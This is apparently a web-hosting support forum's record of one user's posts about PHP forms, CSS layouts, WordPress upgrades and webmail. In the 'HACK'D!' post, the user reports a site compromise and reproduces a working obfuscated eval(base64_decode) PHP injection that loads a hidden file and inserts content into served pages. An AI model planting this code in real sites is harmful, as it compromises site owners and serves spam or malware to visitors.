Technical Support / Possibly PHP-related questions
February 19, 2011, 08:17:52 AM
Hello! I'm trying to keep tabs on things that changed since the recent PHP upgrades. Some of the small PHP forms on my websites don't get used very often, but they all used to work. Right now, they don't! I'm not sure what to do about it.

Such forms can be found here http://www.webcomicstarot.com/rules.php#join
And here http://ai.senshuu.com/commissions.php
Also here http://www.lovefeast-comic.com/ask.php

(They're all basically the same, but I added different fields to one of them)

They all go to the error page, no matter what. I didn't change them anytime recently. Xepher, could you look into it?

Also, AWStats doesn't seem to be working right now!

Web Design / Weird Spaces
January 31, 2010, 04:27:38 AM
Ohh web design bugs me so much sometimes!

I've noticed for a while that on some of my sites (like Millennium http://millennium.senshuu.com), once the page finishes loading, there's a weird space between the very top of the content area and the top of the web browser area, where there shouldn't be one. (This happens for most of my layouts that are designed to always touch the very top of areas.) Like, the space pops in as soon as the page finishes loading.

I'm thinking there's some kind of Javascript code I'm using that might be causing this, because it didn't always happen. Also, when you navigate to any other page on the site the space goes away and won't come back unless you're just loading up the site in a tab/browser window for the first time.

I know it's not just my PC since it happens in all browsers on any PC, so I'm wondering just what might be causing it and how to fix it. Hurrrm.

Technical Support / Deleting Email
July 12, 2009, 10:09:06 AM
I noticed that when I delete mail on webmail here, it doesn't actually go to the trash. The trash remains empty. That saddens me, as there were a few things I deleted on accident that I wanted to go back and check on.

Maybe it's just a my-account thing?

Technical Support / Blocking IE8
June 27, 2009, 06:40:34 AM
So I heard Xephernet main blocks IE8. :0

I had heard it blocks IE6, which no one should care about anyway, but why would it block IE8 (probably the first release of IE to actually be decent)?

I found out when someone mentioned not recommending Xepher as a hosting place for webcomics (although I would), even though Xepher does his every best to provide, and IE seems to work on every site that is not the main anyway.

The question was something like "if it blocks IE, what else will it bother to provide you?" Said even after I explained that every other hosted site has everything they should have provided to them, and works in IE.

Technical Support / HACK'D!
June 20, 2009, 05:10:07 AM
HEY, so suddenly I found out that every PHP file I have uploaded throughout all my sites has had something like this appended to the top of the file:

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9taWxsZW5uaXVtL3B1YmxpY19odG1sL2ZvcnVtcy9UaGVtZXMvTWlkbmlnaHRNaXN0XzFfMF94L01pZG5pZ2h0TWlzdF8xXzBfeC9NaWRuaWdodE1pc3QvaW1hZ2VzL2JiYy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvbWlsbGVubml1bS9wdWJsaWNfaHRtbC9mb3J1bXMvVGhlbWVzL01pZG5pZ2h0TWlzdF8xXzBfeC9NaWRuaWdodE1pc3RfMV8wX3gvTWlkbmlnaHRNaXN0L2ltYWdlcy9iYmMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

I reinstalled my Wordpress installs and am reuploading everything else. I found this out when suddenly files I was uploading were smaller than live files, and when someone pointed out that all the text on my sites looked like spam text on his phone browser. :[

How do you think this happened? I still gotta fix my oekaki and news files too, gah.
Arggh, and my forum too. Can you have SMF forums auto-reinstall like Wordpress? (Well, I just updated it 1.1.9, but there're still some old hacked files.)

Gah, even my plugins are haxed. D:

EDIT: Okay, I reuploaded everything but my plugins and forum themes. Guh.

Someone's explaining how this could have happened: "shared server php upload and/or append hack" Just when I thought I never had to worry about permissions!
He says the hack may be this: http://www.lonelyfetus.com/hack.txt
And looks like this decoded: http://www.lonelyfetus.com/decodedhack.txt or something
If that helps.

Actually, looking more closely at that, it mentions the directory of a forum theme I wasn't even using and thought I had deleted. I bet one of the forum accounts that signed up but never posted did this. e__e

Note that I think this happened on the 15th and again on the 17th, since that's when all my files were modified on the server despite my having not touched them in ages.

Knowhow Trading Post / Wordpress 2.8
June 12, 2009, 01:43:56 AM
I upgraded to it, and it broke that one comic's archives. (Which is odd, since I upgraded on another site and nothing happened.)

I come up with either a blank screen for everything in the admin area, or this error mooshes all over my site:

QuoteFatal error: Cannot use object of type WP_Error as array in /home/millennium/public_html/lf/pages/wp-includes/category.php on line 137

Yay. Any other Xepher site experience this? I might know why, but even when I know, it doesn't make sense, since other sites with my exact same setup upgraded fine.

Forgot what other thread I asked things in. Should probably start using bookmarks more efficiently...

Anyway, I was wondering if it's possible to...

- use mod_rewrite to hide certain directories in a URL?

To give an example, and this might be terribly convoluted to begin with, but I made it so that

Quotesenshuu.com/mil/

can be accessed through

Quotemillennium.senshuu.com

but sometimes (through my wacky old news system, dur) you can see the /mil/ directory pop up in the url's rewritten form, like so:

Quotemillennium.senshuu.com/mil/

Awfully redundant, huh?
I'd like to be able to phase that out of any generated url! But it's probably not possible.

Of course, it's not like the main rewritten url, millennium.senshuu.com, is a redirect of senshuu.com/mil/, and if I wanted it to be, things would get convoluted real fast with redirects here and there... So I guess I wouldn't be able to "hide" parts of URLs like directories, would I?

I hope this makes any sense. I feel totally silly for asking at all, and yet my curiosity goes wild, and my searches rarely yield anything I can get without reaaally going into this (and possibly learning a whole bunch of things I didn't intend to). XD

- I think my other question was going to be something more relating to redirects, but uh. Suddenly I don't feel the need to ask. Hehe.

EDIT: Yes, after some experimentation, I see I'd be basically redirecting a file to the same file, which is... not possible, and also dumb. XD

Knowhow Trading Post / Mysterious 404s
April 16, 2009, 06:59:23 AM
Recently I changed the entire archives for both my webcomics. There should be absolutely no way to access the old files anymore, as they no longer exist. Yet, according to AWStats (which is very good at helping me weed out broken links), lots of people are still somehow clicking to old pages of mine.

I did realize part of it was due to forum posts on my own forum, which I changed, but it still happens with a variety of older pages that I'm sure I didn't link anywhere anytime recently (or ever). I thought maybe people have bookmarked them too, but then that still shouldn't happen so much because I have much doubt people bookmarked random old pages of mine!

Some other 404s seem strange to me too, lol. (And the AWStats Wii icon is broken apparently. |D) Anyone else have strange 404s?

Web Design / Forms
February 15, 2009, 11:23:20 AM
I finally found a free site that generates an actual email submission form for you. Yay! It's this one: http://www.tele-pro.co.uk/scripts/contact_form/

It worked when I tested it on the site. However, when I put it in this page, suddenly it doesn't work anymore. It gives me the not-sent error every time, and I have no clue why. Boooo!

I hope it doesn't have anything to do with the way email-stuff's set up on the server. I thought this was pretty simple...

Misc. Content / Mysterious Firefox Phenomena
February 14, 2009, 12:53:02 AM
Firefox does weird things. Both versions, Windows and Mac. Apart from using up 95-99% of my CPU within fifteen minutes to half an hour of opening it (which I won't fault it too hard for, as it seems even Chrome and Safari does this now and much more annoyingly, ugh), it does things sometimes like not showing me images on pages, when the images are definitely linked correctly.

In fact, I can go directly to the image URL and it'll load up fine, but on pages they won't show at all. I can look at the image under Page Info and it'll be like: broken! This has happened with a select few of my own hosted pictures on my own websites, and a few from Photobucket... they show up in other browsers. c_c

Knowhow Trading Post / Sitemaps
January 17, 2009, 11:44:39 AM
Those xml/rss ROR things! I'm trying to get my head around them. I've been curious ever since briefly hearing about them years ago in a web class. (My last attempts to learn more fell short, and now I turn to you, O helpful forums!)

From what I've seen so far there are a few ways to do them, not all compatible with search engines. I'm just wondering which kind is. And then I can't seem to find a good example of how they actually work, or show up, or something. I thought I knew, but now I'm really not sure.

If it's how I think it is, then sitemaps are cool, and I wanted to do some for my silly little sites, hee.

Edit: Ohh, I found out some more things finally. It's a lot more involving than I initially thought. (I thought you'd upload a file and it'd be indexed just like that...shows what I knew.) Safe to say, I can see why most people don't do this. But for bored people like me...

Web Design / General CSS Thread
January 10, 2009, 12:49:25 PM
CSS is good. CSS has been kind to me!

But sometimes you wonder why it does strange things. You wonder why, when you tell a div that all its links are going to be at 0.7 opacity, only one of the links in the div complies to that rule - especially when another div with similar properties is doing as it should. :O

And you wonder why overflow:auto never ever seems to work. Any idea why it wouldn't?

(I'm to give you very specific examples very soon)

Web Design / Wonderful Style-Switching!
October 05, 2008, 01:25:06 AM
So, I recently figured out how to make different layouts for the same website using only CSS (and a tad of Javascript). It is lovely. I have made three layouts for my Lovefeast website, seen here:

http://lf.senshuu.com/index2.php

Three image links in the sidebar change the layout just like that, and soon I'll be adding one more! Why haven't more people done this?? (Or maybe they have and I just haven't seen... but seriously, I wanna see it more on the kinds of sites I browse!)

While I'm still tweaking and improving things with all the layouts and doing some things tableless has been an absolute pain in the fanny, I'm really liking that I'm able to do this. Of course, sooner or later I'll figure out how to better do some of the things I'm doing in CSS, but for now I'm happy. <3

For the record, this is the tutorial I used: http://www.alistapart.com/stories/alternate/ This website is pretty great.

Web Design / Floating oh my gosh
September 13, 2008, 03:26:32 PM
So, floating. I've been reading tutorials. They are somewhat confusing.

http://senshuu.com/oekaki/ I just wanted those two divs (the sides each with the gryphon and the dragon) to be centered on the page, and also to see how float would affect that. I have no idea why the right one stretches out like that, and then the text that isn't within one of those two divs acts funny.

This is also connected with my random inability to center certain things even when I try, like forms. The last frontier! I'm so close to knowing everything I should know by now!

I've been able to understand the way people explain things on this forum pretty well, so I'd like to ask someone here about it, lol.

Knowhow Trading Post / Free Forums

Any suggestions?

I know PHPBB is generally kind of terrible (it's the ezboard of self-installed PHP message boards, if I understand correctly), and I don't want to spend hours re-modding script just to have cool things that all forums should have.

I was thinking of setting one up on Invisionfree, but I'll see what you all suggest!

Knowhow Trading Post / Not-working Javascript
July 25, 2008, 01:48:59 AM
Looks like I'll be looking at a lot of Javascript in the near future.

For now, however, the TINIEST thing is puzzling me.

The Javascript I'm using to create a popup window from a link on this links page (the more banners link) is not working, although it used to.

I use the exact same script on this one and this one, and they both work.

I can't for the life of me figure out why, and I'm sure I haven't overlooked anything 'cause I spent a long time trying to figure this out. Ouuu.
#18
I've been asking a lot lately. My mind is always here-and-there. I try only to ask after I've exhausted my searches! Thus comes this query!

I've been wondering how one goes about skinning a website. I'm not even sure how to start, which is why my searches turn up dry, I suppose. What am I searching for? Is it some really advanced CSS-manipulating code that I don't want to learn? Or is it, perhaps, so simple that it's surprising I still don't know it?

Help a girl out! Please.
#19
A tagboard script! I need one!

My search usually turns up something useless (doesn't work as easily as said). The one I had closest to working broke during the last server move/upgrade/whatsis.

Thanks!

C'mon. Someone here's gotta like Katamari. Either of them.
